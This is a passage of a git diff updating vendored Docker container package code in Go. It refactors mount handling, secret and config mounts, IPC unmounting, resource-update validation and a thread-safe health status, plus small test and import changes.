 			if m, exists := container.MountPoints["/etc/resolv.conf"]; exists {
 				writable = m.RW
+			} else {
+				label.Relabel(container.ResolvConfPath, container.MountLabel, shared)
 			}
 			mounts = append(mounts, Mount{
 				Source:      container.ResolvConfPath,
 				Destination: "/etc/resolv.conf",
 				Writable:    writable,
-				Propagation: string(volume.DefaultPropagationMode),
+				Propagation: string(parser.DefaultPropagationMode()),
 			})
 		}
 	}
@@ -129,18 +86,17 @@ func (container *Container) NetworkMounts() []Mount {
 		if _, err := os.Stat(container.HostnamePath); err != nil {
 			logrus.Warnf("HostnamePath set to %q, but can't stat this filename (err = %v); skipping", container.HostnamePath, err)
 		} else {
-			if !container.HasMountFor("/etc/hostname") {
-				label.Relabel(container.HostnamePath, container.MountLabel, shared)
-			}
 			writable := !container.HostConfig.ReadonlyRootfs
 			if m, exists := container.MountPoints["/etc/hostname"]; exists {
 				writable = m.RW
+			} else {
+				label.Relabel(container.HostnamePath, container.MountLabel, shared)
 			}
 			mounts = append(mounts, Mount{
 				Source:      container.HostnamePath,
 				Destination: "/etc/hostname",
 				Writable:    writable,
-				Propagation: string(volume.DefaultPropagationMode),
+				Propagation: string(parser.DefaultPropagationMode()),
 			})
 		}
 	}
@@ -148,37 +104,31 @@ func (container *Container) NetworkMounts() []Mount {
 		if _, err := os.Stat(container.HostsPath); err != nil {
 			logrus.Warnf("HostsPath set to %q, but can't stat this filename (err = %v); skipping", container.HostsPath, err)
 		} else {
-			if !container.HasMountFor("/etc/hosts") {
-				label.Relabel(container.HostsPath, container.MountLabel, shared)
-			}
 			writable := !container.HostConfig.ReadonlyRootfs
 			if m, exists := container.MountPoints["/etc/hosts"]; exists {
 				writable = m.RW
+			} else {
+				label.Relabel(container.HostsPath, container.MountLabel, shared)
 			}
 			mounts = append(mounts, Mount{
 				Source:      container.HostsPath,
 				Destination: "/etc/hosts",
 				Writable:    writable,
-				Propagation: string(volume.DefaultPropagationMode),
+				Propagation: string(parser.DefaultPropagationMode()),
 			})
 		}
 	}
 	return mounts
 }
 
-// SecretMountPath returns the path of the secret mount for the container
-func (container *Container) SecretMountPath() string {
-	return filepath.Join(container.Root, "secrets")
-}
-
 // CopyImagePathContent copies files in destination to the volume.
 func (container *Container) CopyImagePathContent(v volume.Volume, destination string) error {
-	rootfs, err := symlink.FollowSymlinkInScope(filepath.Join(container.BaseFS, destination), container.BaseFS)
+	rootfs, err := container.GetResourcePath(destination)
 	if err != nil {
 		return err
 	}
 
-	if _, err = ioutil.ReadDir(rootfs); err != nil {
+	if _, err := os.Stat(rootfs); err != nil {
 		if os.IsNotExist(err) {
 			return nil
 		}
@@ -204,97 +154,160 @@ func (container *Container) CopyImagePathContent(v volume.Volume, destination st
 
 // ShmResourcePath returns path to shm
 func (container *Container) ShmResourcePath() (string, error) {
-	return container.GetRootResourcePath("shm")
+	return container.MountsResourcePath("shm")
 }
 
 // HasMountFor checks if path is a mountpoint
 func (container *Container) HasMountFor(path string) bool {
 	_, exists := container.MountPoints[path]
-	return exists
-}
-
-// UnmountIpcMounts uses the provided unmount function to unmount shm and mqueue if they were mounted
-func (container *Container) UnmountIpcMounts(unmount func(pth string) error) {
-	if container.HostConfig.IpcMode.IsContainer() || container.HostConfig.IpcMode.IsHost() {
-		return
+	if exists {
+		return true
 	}
 
-	var warnings []string
+	// Also search among the tmpfs mounts
+	for dest := range container.HostConfig.Tmpfs {
+		if dest == path {
+			return true
+		}
+	}
 
-	if !container.HasMountFor("/dev/shm") {
-		shmPath, err := container.ShmResourcePath()
-		if err != nil {
-			logrus.Error(err)
-			warnings = append(warnings, err.Error())
-		} else if shmPath != "" {
-			if err := unmount(shmPath); err != nil && !os.IsNotExist(err) {
-				warnings = append(warnings, fmt.Sprintf("failed to umount %s: %v", shmPath, err))
-			}
+	return false
+}
 
-		}
+// UnmountIpcMount uses the provided unmount function to unmount shm if it was mounted
+func (container *Container) UnmountIpcMount(unmount func(pth string) error) error {
+	if container.HasMountFor("/dev/shm") {
+		return nil
 	}
 
-	if len(warnings) > 0 {
-		logrus.Warnf("failed to cleanup ipc mounts:\n%v", strings.Join(warnings, "\n"))
+	// container.ShmPath should not be used here as it may point
+	// to the host's or other container's /dev/shm
+	shmPath, err := container.ShmResourcePath()
+	if err != nil {
+		return err
+	}
+	if shmPath == "" {
+		return nil
+	}
+	if err = unmount(shmPath); err != nil && !os.IsNotExist(err) {
+		if mounted, mErr := mount.Mounted(shmPath); mounted || mErr != nil {
+			return errors.Wrapf(err, "umount %s", shmPath)
+		}
 	}
+	return nil
 }
 
 // IpcMounts returns the list of IPC mounts
 func (container *Container) IpcMounts() []Mount {
 	var mounts []Mount
+	parser := volumemounts.NewParser(container.OS)
 
-	if !container.HasMountFor("/dev/shm") {
-		label.SetFileLabel(container.ShmPath, container.MountLabel)
-		mounts = append(mounts, Mount{
-			Source:      container.ShmPath,
-			Destination: "/dev/shm",
-			Writable:    true,
-			Propagation: string(volume.DefaultPropagationMode),
-		})
+	if container.HasMountFor("/dev/shm") {
+		return mounts
+	}
+	if container.ShmPath == "" {
+		return mounts
 	}
 
+	label.SetFileLabel(container.ShmPath, container.MountLabel)
+	mounts = append(mounts, Mount{
+		Source:      container.ShmPath,
+		Destination: "/dev/shm",
+		Writable:    true,
+		Propagation: string(parser.DefaultPropagationMode()),
+	})
+
 	return mounts
 }
 
-// SecretMount returns the mount for the secret path
-func (container *Container) SecretMount() *Mount {
-	if len(container.SecretReferences) > 0 {
-		return &Mount{
-			Source:      container.SecretMountPath(),
-			Destination: containerSecretMountPath,
+// SecretMounts returns the mounts for the secret path.
+func (container *Container) SecretMounts() ([]Mount, error) {
+	var mounts []Mount
+	for _, r := range container.SecretReferences {
+		if r.File == nil {
+			continue
+		}
+		src, err := container.SecretFilePath(*r)
+		if err != nil {
+			return nil, err
+		}
+		mounts = append(mounts, Mount{
+			Source:      src,
+			Destination: getSecretTargetPath(r),
 			Writable:    false,
+		})
+	}
+	for _, r := range container.ConfigReferences {
+		fPath, err := container.ConfigFilePath(*r)
+		if err != nil {
+			return nil, err
 		}
+		mounts = append(mounts, Mount{
+			Source:      fPath,
+			Destination: r.File.Name,
+			Writable:    false,
+		})
 	}
 
-	return nil
+	return mounts, nil
 }
 
 // UnmountSecrets unmounts the local tmpfs for secrets
 func (container *Container) UnmountSecrets() error {
-	if _, err := os.Stat(container.SecretMountPath()); err != nil {
+	p, err := container.SecretMountPath()
+	if err != nil {
+		return err
+	}
+	if _, err := os.Stat(p); err != nil {
 		if os.IsNotExist(err) {
 			return nil
 		}
 		return err
 	}
 
-	return detachMounted(container.SecretMountPath())
+	return mount.RecursiveUnmount(p)
 }
 
-// UpdateContainer updates configuration of a container.
-func (container *Container) UpdateContainer(hostConfig *containertypes.HostConfig) error {
-	container.Lock()
-	defer container.Unlock()
+type conflictingUpdateOptions string
+
+func (e conflictingUpdateOptions) Error() string {
+	return string(e)
+}
+
+func (e conflictingUpdateOptions) Conflict() {}
 
+// UpdateContainer updates configuration of a container. Callers must hold a Lock on the Container.
+func (container *Container) UpdateContainer(hostConfig *containertypes.HostConfig) error {
 	// update resources of container
 	resources := hostConfig.Resources
 	cResources := &container.HostConfig.Resources
+
+	// validate NanoCPUs, CPUPeriod, and CPUQuota
+	// Because NanoCPU effectively updates CPUPeriod/CPUQuota,
+	// once NanoCPU is already set, updating CPUPeriod/CPUQuota will be blocked, and vice versa.
+	// In the following we make sure the intended update (resources) does not conflict with the existing (cResource).
+	if resources.NanoCPUs > 0 && cResources.CPUPeriod > 0 {
+		return conflictingUpdateOptions("Conflicting options: Nano CPUs cannot be updated as CPU Period has already been set")
+	}
+	if resources.NanoCPUs > 0 && cResources.CPUQuota > 0 {
+		return conflictingUpdateOptions("Conflicting options: Nano CPUs cannot be updated as CPU Quota has already been set")
+	}
+	if resources.CPUPeriod > 0 && cResources.NanoCPUs > 0 {
+		return conflictingUpdateOptions("Conflicting options: CPU Period cannot be updated as NanoCPUs has already been set")
+	}
+	if resources.CPUQuota > 0 && cResources.NanoCPUs > 0 {
+		return conflictingUpdateOptions("Conflicting options: CPU Quota cannot be updated as NanoCPUs has already been set")
+	}
+
 	if resources.BlkioWeight != 0 {
 		cResources.BlkioWeight = resources.BlkioWeight
 	}
 	if resources.CPUShares != 0 {
 		cResources.CPUShares = resources.CPUShares
 	}
+	if resources.NanoCPUs != 0 {
+		cResources.NanoCPUs = resources.NanoCPUs
+	}
 	if resources.CPUPeriod != 0 {
 		cResources.CPUPeriod = resources.CPUPeriod
 	}
@@ -311,7 +324,7 @@ func (container *Container) UpdateContainer(hostConfig *containertypes.HostConfi
 		// if memory limit smaller than already set memoryswap limit and doesn't
 		// update the memoryswap limit, then error out.
 		if resources.Memory > cResources.MemorySwap && resources.MemorySwap == 0 {
-			return fmt.Errorf("Memory limit should be smaller than already set memoryswap limit, update the memoryswap at the same time")
+			return conflictingUpdateOptions("Memory limit should be smaller than already set memoryswap limit, update the memoryswap at the same time")
 		}
 		cResources.Memory = resources.Memory
 	}
@@ -324,20 +337,21 @@ func (container *Container) UpdateContainer(hostConfig *containertypes.HostConfi
 	if resources.KernelMemory != 0 {
 		cResources.KernelMemory = resources.KernelMemory
 	}
+	if resources.CPURealtimePeriod != 0 {
+		cResources.CPURealtimePeriod = resources.CPURealtimePeriod
+	}
+	if resources.CPURealtimeRuntime != 0 {
+		cResources.CPURealtimeRuntime = resources.CPURealtimeRuntime
+	}
 
 	// update HostConfig of container
 	if hostConfig.RestartPolicy.Name != "" {
 		if container.HostConfig.AutoRemove && !hostConfig.RestartPolicy.IsNone() {
-			return fmt.Errorf("Restart policy cannot be updated because AutoRemove is enabled for the container")
+			return conflictingUpdateOptions("Restart policy cannot be updated because AutoRemove is enabled for the container")
 		}
 		container.HostConfig.RestartPolicy = hostConfig.RestartPolicy
 	}
 
-	if err := container.ToDisk(); err != nil {
-		logrus.Errorf("Error saving updated container: %v", err)
-		return err
-	}
-
 	return nil
 }
 
@@ -367,7 +381,7 @@ func (container *Container) DetachAndUnmount(volumeEventLog func(name, action st
 	}
 
 	for _, mountPath := range mountPaths {
-		if err := detachMounted(mountPath); err != nil {
+		if err := mount.Unmount(mountPath); err != nil {
 			logrus.Warnf("%s unmountVolumes: Failed to do lazy umount fo volume '%s': %v", container.ID, mountPath, err)
 		}
 	}
@@ -377,42 +391,20 @@ func (container *Container) DetachAndUnmount(volumeEventLog func(name, action st
 // copyExistingContents copies from the source to the destination and
 // ensures the ownership is appropriately set.
 func copyExistingContents(source, destination string) error {
-	volList, err := ioutil.ReadDir(source)
-	if err != nil {
-		return err
-	}
-	if len(volList) > 0 {
-		srcList, err := ioutil.ReadDir(destination)
-		if err != nil {
-			return err
-		}
-		if len(srcList) == 0 {
-			// If the source volume is empty, copies files from the root into the volume
-			if err := chrootarchive.CopyWithTar(source, destination); err != nil {
-				return err
-			}
-		}
-	}
-	return copyOwnership(source, destination)
-}
-
-// copyOwnership copies the permissions and uid:gid of the source file
-// to the destination file
-func copyOwnership(source, destination string) error {
-	stat, err := system.Stat(source)
+	dstList, err := ioutil.ReadDir(destination)
 	if err != nil {
 		return err
 	}
-
-	if err := os.Chown(destination, int(stat.UID()), int(stat.GID())); err != nil {
-		return err
+	if len(dstList) != 0 {
+		// destination is not empty, do not copy
+		return nil
 	}
-
-	return os.Chmod(destination, os.FileMode(stat.Mode()))
+	return fs.CopyDir(destination, source)
 }
 
 // TmpfsMounts returns the list of tmpfs mounts
 func (container *Container) TmpfsMounts() ([]Mount, error) {
+	parser := volumemounts.NewParser(container.OS)
 	var mounts []Mount
 	for dest, data := range container.HostConfig.Tmpfs {
 		mounts = append(mounts, Mount{
@@ -423,7 +415,7 @@ func (container *Container) TmpfsMounts() ([]Mount, error) {
 	}
 	for dest, mnt := range container.MountPoints {
 		if mnt.Type == mounttypes.TypeTmpfs {
-			data, err := volume.ConvertTmpfsOptions(mnt.Spec.TmpfsOptions, mnt.Spec.ReadOnly)
+			data, err := parser.ConvertTmpfsOptions(mnt.Spec.TmpfsOptions, mnt.Spec.ReadOnly)
 			if err != nil {
 				return nil, err
 			}
@@ -437,12 +429,35 @@ func (container *Container) TmpfsMounts() ([]Mount, error) {
 	return mounts, nil
 }
 
-// cleanResourcePath cleans a resource path and prepares to combine with mnt path
-func cleanResourcePath(path string) string {
-	return filepath.Join(string(os.PathSeparator), path)
-}
-
 // EnableServiceDiscoveryOnDefaultNetwork Enable service discovery on default network
 func (container *Container) EnableServiceDiscoveryOnDefaultNetwork() bool {
 	return false
 }
+
+// GetMountPoints gives a platform specific transformation to types.MountPoint. Callers must hold a Container lock.
+func (container *Container) GetMountPoints() []types.MountPoint {
+	mountPoints := make([]types.MountPoint, 0, len(container.MountPoints))
+	for _, m := range container.MountPoints {
+		mountPoints = append(mountPoints, types.MountPoint{
+			Type:        m.Type,
+			Name:        m.Name,
+			Source:      m.Path(),
+			Destination: m.Destination,
+			Driver:      m.Driver,
+			Mode:        m.Mode,
+			RW:          m.RW,
+			Propagation: m.Propagation,
+		})
+	}
+	return mountPoints
+}
+
+// ConfigFilePath returns the path to the on-disk location of a config.
+// On unix, configs are always considered secret
+func (container *Container) ConfigFilePath(configRef swarmtypes.ConfigReference) (string, error) {
+	mounts, err := container.SecretMountPath()
+	if err != nil {
+		return "", err
+	}
+	return filepath.Join(mounts, configRef.ConfigID), nil
+}
diff --git a/vendor/github.com/docker/docker/container/container_windows.go b/vendor/github.com/docker/docker/container/container_windows.go
index 1025836f1f..b5bdb5bc34 100644
--- a/vendor/github.com/docker/docker/container/container_windows.go
+++ b/vendor/github.com/docker/docker/container/container_windows.go
@@ -1,41 +1,29 @@
-// +build windows
-
-package container
+package container // import "github.com/docker/docker/container"
 
 import (
 	"fmt"
 	"os"
 	"path/filepath"
 
+	"github.com/docker/docker/api/types"
 	containertypes "github.com/docker/docker/api/types/container"
-	"github.com/docker/docker/utils"
+	swarmtypes "github.com/docker/docker/api/types/swarm"
+	"github.com/docker/docker/pkg/system"
 )
 
-// Container holds fields specific to the Windows implementation. See
-// CommonContainer for standard fields common to all containers.
-type Container struct {
-	CommonContainer
-
-	// Fields below here are platform specific.
-}
-
-// ExitStatus provides exit reasons for a container.
-type ExitStatus struct {
-	// The exit code with which the container exited.
-	ExitCode int
-}
+const (
+	containerSecretMountPath         = `C:\ProgramData\Docker\secrets`
+	containerInternalSecretMountPath = `C:\ProgramData\Docker\internal\secrets`
+	containerInternalConfigsDirPath  = `C:\ProgramData\Docker\internal\configs`
 
-// CreateDaemonEnvironment creates a new environment variable slice for this container.
-func (container *Container) CreateDaemonEnvironment(_ bool, linkedEnv []string) []string {
-	// because the env on the container can override certain default values
-	// we need to replace the 'env' keys where they match and append anything
-	// else.
-	return utils.ReplaceOrAppendEnvValues(linkedEnv, container.Config.Env)
-}
+	// DefaultStopTimeout is the timeout (in seconds) for the shutdown call on a container
+	DefaultStopTimeout = 30
+)
 
-// UnmountIpcMounts unmounts Ipc related mounts.
+// UnmountIpcMount unmounts Ipc related mounts.
 // This is a NOOP on windows.
-func (container *Container) UnmountIpcMounts(unmount func(pth string) error) {
+func (container *Container) UnmountIpcMount(unmount func(pth string) error) error {
+	return nil
 }
 
 // IpcMounts returns the list of Ipc related mounts.
@@ -43,16 +31,94 @@ func (container *Container) IpcMounts() []Mount {
 	return nil
 }
 
-// SecretMount returns the mount for the secret path
-func (container *Container) SecretMount() *Mount {
+// CreateSecretSymlinks creates symlinks to files in the secret mount.
+func (container *Container) CreateSecretSymlinks() error {
+	for _, r := range container.SecretReferences {
+		if r.File == nil {
+			continue
+		}
+		resolvedPath, _, err := container.ResolvePath(getSecretTargetPath(r))
+		if err != nil {
+			return err
+		}
+		if err := system.MkdirAll(filepath.Dir(resolvedPath), 0, ""); err != nil {
+			return err
+		}
+		if err := os.Symlink(filepath.Join(containerInternalSecretMountPath, r.SecretID), resolvedPath); err != nil {
+			return err
+		}
+	}
+
 	return nil
 }
 
+// SecretMounts returns the mount for the secret path.
+// All secrets are stored in a single mount on Windows. Target symlinks are
+// created for each secret, pointing to the files in this mount.
+func (container *Container) SecretMounts() ([]Mount, error) {
+	var mounts []Mount
+	if len(container.SecretReferences) > 0 {
+		src, err := container.SecretMountPath()
+		if err != nil {
+			return nil, err
+		}
+		mounts = append(mounts, Mount{
+			Source:      src,
+			Destination: containerInternalSecretMountPath,
+			Writable:    false,
+		})
+	}
+
+	return mounts, nil
+}
+
 // UnmountSecrets unmounts the fs for secrets
 func (container *Container) UnmountSecrets() error {
+	p, err := container.SecretMountPath()
+	if err != nil {
+		return err
+	}
+	return os.RemoveAll(p)
+}
+
+// CreateConfigSymlinks creates symlinks to files in the config mount.
+func (container *Container) CreateConfigSymlinks() error {
+	for _, configRef := range container.ConfigReferences {
+		if configRef.File == nil {
+			continue
+		}
+		resolvedPath, _, err := container.ResolvePath(configRef.File.Name)
+		if err != nil {
+			return err
+		}
+		if err := system.MkdirAll(filepath.Dir(resolvedPath), 0, ""); err != nil {
+			return err
+		}
+		if err := os.Symlink(filepath.Join(containerInternalConfigsDirPath, configRef.ConfigID), resolvedPath); err != nil {
+			return err
+		}
+	}
+
 	return nil
 }
 
+// ConfigMounts returns the mount for configs.
+// TODO: Right now Windows doesn't really have a "secure" storage for secrets,
+// however some configs may contain secrets. Once secure storage is worked out,
+// configs and secret handling should be merged.
+func (container *Container) ConfigMounts() []Mount {
+	var mounts []Mount
+	if len(container.ConfigReferences) > 0 {
+		mounts = append(mounts, Mount{
+			Source:      container.ConfigsDirPath(),
+			Destination: containerInternalConfigsDirPath,
+			Writable:    false,
+		})
+	}
+
+	return mounts
+}
+
 // DetachAndUnmount unmounts all volumes.
 // On Windows it only delegates to `UnmountVolumes` since there is nothing to
 // force unmount.
@@ -66,17 +132,40 @@ func (container *Container) TmpfsMounts() ([]Mount, error) {
 	return mounts, nil
 }
 
-// UpdateContainer updates configuration of a container
+// UpdateContainer updates configuration of a container. Callers must hold a Lock on the Container.
 func (container *Container) UpdateContainer(hostConfig *containertypes.HostConfig) error {
-	container.Lock()
-	defer container.Unlock()
 	resources := hostConfig.Resources
-	if resources.BlkioWeight != 0 || resources.CPUShares != 0 ||
-		resources.CPUPeriod != 0 || resources.CPUQuota != 0 ||
-		resources.CpusetCpus != "" || resources.CpusetMems != "" ||
-		resources.Memory != 0 || resources.MemorySwap != 0 ||
-		resources.MemoryReservation != 0 || resources.KernelMemory != 0 {
-		return fmt.Errorf("Resource updating isn't supported on Windows")
+	if resources.CPUShares != 0 ||
+		resources.Memory != 0 ||
+		resources.NanoCPUs != 0 ||
+		resources.CgroupParent != "" ||
+		resources.BlkioWeight != 0 ||
+		len(resources.BlkioWeightDevice) != 0 ||
+		len(resources.BlkioDeviceReadBps) != 0 ||
+		len(resources.BlkioDeviceWriteBps) != 0 ||
+		len(resources.BlkioDeviceReadIOps) != 0 ||
+		len(resources.BlkioDeviceWriteIOps) != 0 ||
+		resources.CPUPeriod != 0 ||
+		resources.CPUQuota != 0 ||
+		resources.CPURealtimePeriod != 0 ||
+		resources.CPURealtimeRuntime != 0 ||
+		resources.CpusetCpus != "" ||
+		resources.CpusetMems != "" ||
+		len(resources.Devices) != 0 ||
+		len(resources.DeviceCgroupRules) != 0 ||
+		resources.DiskQuota != 0 ||
+		resources.KernelMemory != 0 ||
+		resources.MemoryReservation != 0 ||
+		resources.MemorySwap != 0 ||
+		resources.MemorySwappiness != nil ||
+		resources.OomKillDisable != nil ||
+		resources.PidsLimit != 0 ||
+		len(resources.Ulimits) != 0 ||
+		resources.CPUCount != 0 ||
+		resources.CPUPercent != 0 ||
+		resources.IOMaximumIOps != 0 ||
+		resources.IOMaximumBandwidth != 0 {
+		return fmt.Errorf("resource updating isn't supported on Windows")
 	}
 	// update HostConfig of container
 	if hostConfig.RestartPolicy.Name != "" {
@@ -88,18 +177,6 @@ func (container *Container) UpdateContainer(hostConfig *containertypes.HostConfi
 	return nil
 }
 
-// cleanResourcePath cleans a resource path by removing C:\ syntax, and prepares
-// to combine with a volume path
-func cleanResourcePath(path string) string {
-	if len(path) >= 2 {
-		c := path[0]
-		if path[1] == ':' && ('a' <= c && c <= 'z' || 'A' <= c && c <= 'Z') {
-			path = path[2:]
-		}
-	}
-	return filepath.Join(string(os.PathSeparator), path)
-}
-
 // BuildHostnameFile writes the container's hostname file.
 func (container *Container) BuildHostnameFile() error {
 	return nil
@@ -109,3 +186,28 @@ func (container *Container) BuildHostnameFile() error {
 func (container *Container) EnableServiceDiscoveryOnDefaultNetwork() bool {
 	return true
 }
+
+// GetMountPoints gives a platform specific transformation to types.MountPoint. Callers must hold a Container lock.
+func (container *Container) GetMountPoints() []types.MountPoint {
+	mountPoints := make([]types.MountPoint, 0, len(container.MountPoints))
+	for _, m := range container.MountPoints {
+		mountPoints = append(mountPoints, types.MountPoint{
+			Type:        m.Type,
+			Name:        m.Name,
+			Source:      m.Path(),
+			Destination: m.Destination,
+			Driver:      m.Driver,
+			RW:          m.RW,
+		})
+	}
+	return mountPoints
+}
+
+func (container *Container) ConfigsDirPath() string {
+	return filepath.Join(container.Root, "configs")
+}
+
+// ConfigFilePath returns the path to the on-disk location of a config.
+func (container *Container) ConfigFilePath(configRef swarmtypes.ConfigReference) string {
+	return filepath.Join(container.ConfigsDirPath(), configRef.ConfigID)
+}
diff --git a/vendor/github.com/docker/docker/container/env.go b/vendor/github.com/docker/docker/container/env.go
new file mode 100644
index 0000000000..d225fd1471
--- /dev/null
+++ b/vendor/github.com/docker/docker/container/env.go
@@ -0,0 +1,43 @@
+package container // import "github.com/docker/docker/container"
+
+import (
+	"strings"
+)
+
+// ReplaceOrAppendEnvValues returns the defaults with the overrides either
+// replaced by env key or appended to the list
+func ReplaceOrAppendEnvValues(defaults, overrides []string) []string {
+	cache := make(map[string]int, len(defaults))
+	for i, e := range defaults {
+		parts := strings.SplitN(e, "=", 2)
+		cache[parts[0]] = i
+	}
+
+	for _, value := range overrides {
+		// Values w/o = means they want this env to be removed/unset.
+		if !strings.Contains(value, "=") {
+			if i, exists := cache[value]; exists {
+				defaults[i] = "" // Used to indicate it should be removed
+			}
+			continue
+		}
+
+		// Just do a normal set/update
+		parts := strings.SplitN(value, "=", 2)
+		if i, exists := cache[parts[0]]; exists {
+			defaults[i] = value
+		} else {
+			defaults = append(defaults, value)
+		}
+	}
+
+	// Now remove all entries that we want to "unset"
+	for i := 0; i < len(defaults); i++ {
+		if defaults[i] == "" {
+			defaults = append(defaults[:i], defaults[i+1:]...)
+			i--
+		}
+	}
+
+	return defaults
+}
diff --git a/vendor/github.com/docker/docker/utils/utils_test.go b/vendor/github.com/docker/docker/container/env_test.go
similarity index 56%
rename from vendor/github.com/docker/docker/utils/utils_test.go
rename to vendor/github.com/docker/docker/container/env_test.go
index ab3911e8b3..77856284c2 100644
--- a/vendor/github.com/docker/docker/utils/utils_test.go
+++ b/vendor/github.com/docker/docker/container/env_test.go
@@ -1,14 +1,17 @@
-package utils
+package container // import "github.com/docker/docker/container"
 
 import "testing"
 
 func TestReplaceAndAppendEnvVars(t *testing.T) {
 	var (
-		d = []string{"HOME=/"}
-		o = []string{"HOME=/root", "TERM=xterm"}
+		d = []string{"HOME=/", "FOO=foo_default"}
+		// remove FOO from env
+		// remove BAR from env (nop)
+		o = []string{"HOME=/root", "TERM=xterm", "FOO", "BAR"}
 	)
 
 	env := ReplaceOrAppendEnvValues(d, o)
+	t.Logf("default=%v, override=%v, result=%v", d, o, env)
 	if len(env) != 2 {
 		t.Fatalf("expected len of 2 got %d", len(env))
 	}
diff --git a/vendor/github.com/docker/docker/container/health.go b/vendor/github.com/docker/docker/container/health.go
index 6e3cd12f3b..167ee9b476 100644
--- a/vendor/github.com/docker/docker/container/health.go
+++ b/vendor/github.com/docker/docker/container/health.go
@@ -1,35 +1,63 @@
-package container
+package container // import "github.com/docker/docker/container"
 
 import (
-	"github.com/Sirupsen/logrus"
+	"sync"
+
 	"github.com/docker/docker/api/types"
+	"github.com/sirupsen/logrus"
 )
 
 // Health holds the current container health-check state
 type Health struct {
 	types.Health
 	stop chan struct{} // Write struct{} to stop the monitor
+	mu   sync.Mutex
 }
 
 // String returns a human-readable description of the health-check state
 func (s *Health) String() string {
-	// This happens when the container is being shutdown and the monitor has stopped
-	// or the monitor has yet to be setup.
-	if s.stop == nil {
-		return types.Unhealthy
-	}
+	status := s.Status()
 
-	switch s.Status {
+	switch status {
 	case types.Starting:
 		return "health: starting"
 	default: // Healthy and Unhealthy are clear on their own
-		return s.Status
+		return s.Health.Status
 	}
 }
 
-// OpenMonitorChannel creates and returns a new monitor channel. If there already is one,
-// it returns nil.
+// Status returns the current health status.
+//
+// Note that this takes a lock and the value may change after being read.
+func (s *Health) Status() string {
+	s.mu.Lock()
+	defer s.mu.Unlock()
+
+	// This happens when the monitor has yet to be setup.
+	if s.Health.Status == "" {
+		return types.Unhealthy
+	}
+
+	return s.Health.Status
+}
+
+// SetStatus writes the current status to the underlying health structure,
+// obeying the locking semantics.
+//
+// Status may be set directly if another lock is used.
+func (s *Health) SetStatus(new string) {
+	s.mu.Lock()
+	defer s.mu.Unlock()
+
+	s.Health.Status = new
+}
+
+// OpenMonitorChannel creates and returns a new monitor channel. If there
+// already is one, it returns nil.
 func (s *Health) OpenMonitorChannel() chan struct{} {
+	s.mu.Lock()
+	defer s.mu.Unlock()
+
 	if s.stop == nil {
 		logrus.Debug("OpenMonitorChannel")
 		s.stop = make(chan struct{})
@@ -40,10 +68,15 @@ func (s *Health) OpenMonitorChannel() chan struct{} {
 
 // CloseMonitorChannel closes any existing monitor channel.
 func (s *Health) CloseMonitorChannel() {
+	s.mu.Lock()
+	defer s.mu.Unlock()
+
 	if s.stop != nil {
 		logrus.Debug("CloseMonitorChannel: waiting for probe to stop")
 		close(s.stop)
 		s.stop = nil
+		// unhealthy when the monitor has stopped for compatibility reasons
+		s.Health.Status = types.Unhealthy
 		logrus.Debug("CloseMonitorChannel done")
 	}
 }
diff --git a/vendor/github.com/docker/docker/container/history.go b/vendor/github.com/docker/docker/container/history.go
index c80c2aa0cc..7117d9a437 100644
--- a/vendor/github.com/docker/docker/container/history.go
+++ b/vendor/github.com/docker/docker/container/history.go
@@ -1,4 +1,4 @@
-package container
+package container // import "github.com/docker/docker/container"
 
 import "sort"
 
diff --git a/vendor/github.com/docker/docker/container/memory_store.go b/vendor/github.com/docker/docker/container/memory_store.go
index 706407a71c..ad4c9e20f6 100644
--- a/vendor/github.com/docker/docker/container/memory_store.go
+++ b/vendor/github.com/docker/docker/container/memory_store.go
@@ -1,4 +1,4 @@
-package container
+package container // import "github.com/docker/docker/container"
 
 import (
 	"sync"
diff --git a/vendor/github.com/docker/docker/container/memory_store_test.go b/vendor/github.com/docker/docker/container/memory_store_test.go
index f81738fae1..09a8f27e07 100644
--- a/vendor/github.com/docker/docker/container/memory_store_test.go
+++ b/vendor/github.com/docker/docker/container/memory_store_test.go
@@ -1,4 +1,4 @@
-package container
+package container // import "github.com/docker/docker/container"
 
 import (
 	"testing"
@@ -62,7 +62,7 @@ func TestListContainers(t *testing.T) {
 		t.Fatalf("expected list size 2, got %v", len(list))
 	}
 	if list[0].ID != "id2" {
-		t.Fatalf("expected older container to be first, got %v", list[0].ID)
+		t.Fatalf("expected id2, got %v", list[0].ID)
 	}
 }
 
@@ -101,6 +101,6 @@ func TestApplyAllContainer(t *testing.T) {
 		t.Fatal("expected container to not be nil")
 	}
 	if cont.ID != "newID" {
-		t.Fatalf("expected newID, got %v", cont)
+		t.Fatalf("expected newID, got %v", cont.ID)
 	}
 }
diff --git a/vendor/github.com/docker/docker/container/monitor.go b/vendor/github.com/docker/docker/container/monitor.go
index f05e72b25f..1735e3487e 100644
--- a/vendor/github.com/docker/docker/container/monitor.go
+++ b/vendor/github.com/docker/docker/container/monitor.go
@@ -1,9 +1,9 @@
-package container
+package container // import "github.com/docker/docker/container"
 
 import (
 	"time"
 
-	"github.com/Sirupsen/logrus"
+	"github.com/sirupsen/logrus"
 )
 
 const (
diff --git a/vendor/github.com/docker/docker/container/mounts_unix.go b/vendor/github.com/docker/docker/container/mounts_unix.go
index c52abed2dc..62f4441dce 100644
--- a/vendor/github.com/docker/docker/container/mounts_unix.go
+++ b/vendor/github.com/docker/docker/container/mounts_unix.go
@@ -1,6 +1,6 @@
 // +build !windows
 
-package container
+package container // import "github.com/docker/docker/container"
 
 // Mount contains information for a mount operation.
 type Mount struct {
diff --git a/vendor/github.com/docker/docker/container/mounts_windows.go b/vendor/github.com/docker/docker/container/mounts_windows.go
index 01b327f788..8f27e88067 100644
--- a/vendor/github.com/docker/docker/container/mounts_windows.go
+++ b/vendor/github.com/docker/docker/container/mounts_windows.go
@@ -1,4 +1,4 @@
-package container
+package container // import "github.com/docker/docker/container"
 
 // Mount contains information for a mount operation.
 type Mount struct {
diff --git a/vendor/github.com/docker/docker/container/state.go b/vendor/github.com/docker/docker/container/state.go
index 4dd2ecec69..7c2a1ec81c 100644
--- a/vendor/github.com/docker/docker/container/state.go
+++ b/vendor/github.com/docker/docker/container/state.go
@@ -1,12 +1,12 @@
-package container
+package container // import "github.com/docker/docker/container"
 
 import (
+	"context"
+	"errors"
 	"fmt"
 	"sync"
 	"time"
 
-	"golang.org/x/net/context"
-
 	"github.com/docker/docker/api/types"
 	"github.com/docker/go-units"
 )
@@ -16,8 +16,10 @@ import (
 // functions defined against State to run against Container.
 type State struct {
 	sync.Mutex
-	// FIXME: Why do we have both paused and running if a
-	// container cannot be paused and running at the same time?
+	// Note that `Running` and `Paused` are not mutually exclusive:
+	// When pausing a container (on Linux), the cgroups freezer is used to suspend
+	// all processes in the container. Freezing the process requires the process to
+	// be running. As a result, paused containers are both `Running` _and_ `Paused`.
